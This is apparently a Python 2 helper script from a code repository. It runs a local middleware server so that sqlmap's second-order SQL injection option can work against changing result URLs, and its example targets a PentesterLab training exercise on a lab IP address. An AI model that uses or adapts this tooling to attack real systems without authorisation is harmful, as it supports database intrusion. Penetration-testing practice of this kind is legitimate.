Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
#!/usr/bin/env python
import SimpleHTTPServer
import SocketServer
import sys
import urllib
import logging
from optparse import OptionParser
# Helper example middleware server to enable sqlmap to use its second-order exploitation option with changing urls
# modify as needed for your purposes
# To Use:
# Create your own implementation of the ResultsProvider class which returns the desired page with the nextResult method
# An example of how this can be done for a URL with incrementing value is shown in ResultsProviderImpl
# create an instance of the ThreadedTCPServer, and pass the resultsProvider and any desired parameters in like so
#httpd = ThreadedTCPServer(("", port), ServerHandler)
#httpd.resultsProvider = ResultsProviderImpl(url='http://server/base/path', counter=23)
#httpd.serve_forever()
# Then run sqlmap with the second order option pointing to this server, e.g.
# --second-order=http://127.0.0.1:8000/
# When sqlmap queries this server for the second order result, this server will fetch the appropriate result
# from the remote server and then supply it back to sqlmap, also allowing you to modify the response if desired
class ResultsProvider(object):
'''Base class used to fetch data from server for second order injection using sqlmap'''
import requests
import socket
import time
def __init__(self, **kwargs):
'''Constructor with sensible requests defaults'''
self.session = self.requests.Session()
self.wait = kwargs.get('wait', 2.0)
self.session.verify = kwargs.get('verify', False)
self.session.timeout = kwargs.get('timeout', 5)
self.session.stream = kwargs.get('stream', False)
self.session.proxies = kwargs.get('proxies', {})
self.session.headers = kwargs.get('headers', {})
self.session.allow_redirects = kwargs.get('allow_redirects', True)
self.session.cookies = self.requests.utils.cookiejar_from_dict(kwargs.get('cookies', {}))
self.url = kwargs.get('url', None)
def doRequest(self, url, params=None, **kwargs):
'''Makes web request with timeoout support using requests session'''
while 1:
try:
response = self.session.get(url, params=params, **kwargs)
break
except (self.socket.error, self.requests.exceptions.RequestException):
logging.exception('Retrying request in %.2f seconds...', self.wait)
self.time.sleep(self.wait)
continue
return response
def nextResult(self):
'''Redefine me to make the request and return the response.text'''
#return self.doRequest(url='http://site/whatever/' + str(calculated_value)).text
raise NotImplementedError
class ResultsProviderImpl(ResultsProvider):
'''Example implementation to exploit 2nd order injection in Pentesterlabs Web II SQL Injection'''
def __init__(self, **kwargs):
super(ResultsProviderImpl, self).__init__(**kwargs)
self.counter=kwargs.get('counter', 1)
def nextResult(self):
r = self.doRequest(url=self.url + str(self.counter))
self.counter+=1
return r.text
class ThreadedTCPServer(SocketServer.ThreadingTCPServer):
'''Simple Threaded TCP server'''
pass
class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
'''Simple http server request handler'''
def do_GET(self):
if self.server.debug:
print '=' * 40 + '\n'
print self.headers
print '=' * 40 + '\n'
self.send_response(200)
self.wfile.write('\r\n')
result = self.server.resultsProvider.nextResult()
self.wfile.write(result)
if self.server.debug:
print '=' * 40 + '\n'
print result
print '=' * 40 + '\n'
self.wfile.write('\r\n')
self.wfile.flush()
self.wfile.close()
if __name__ == '__main__':
parser = OptionParser(usage='%prog [options] <httpport>')
parser.add_option('-d', '--debug', dest='debug', action='store_true', help='show debugging messages')
opts, args = parser.parse_args()
if len(args) == 1:
try:
port = int(args[0])
except ValueError:
parser.print_help()
parser.exit()
else:
port = 8000
# parameters for example
# base url where second order injection occurs
baseUrl = 'http://192.168.33.101/sqlinjection/example8/users/'
# starting point to count upwards from in injected results
baseNo = 738
httpd = ThreadedTCPServer(("", port), ServerHandler)
httpd.debug = opts.debug or False
# add the custom resultsprovider implementation
httpd.resultsProvider = ResultsProviderImpl(url=baseUrl, counter=baseNo)
print "Serving at: http://%s:%s/" % ('127.0.0.1', str(port))
httpd.serve_forever()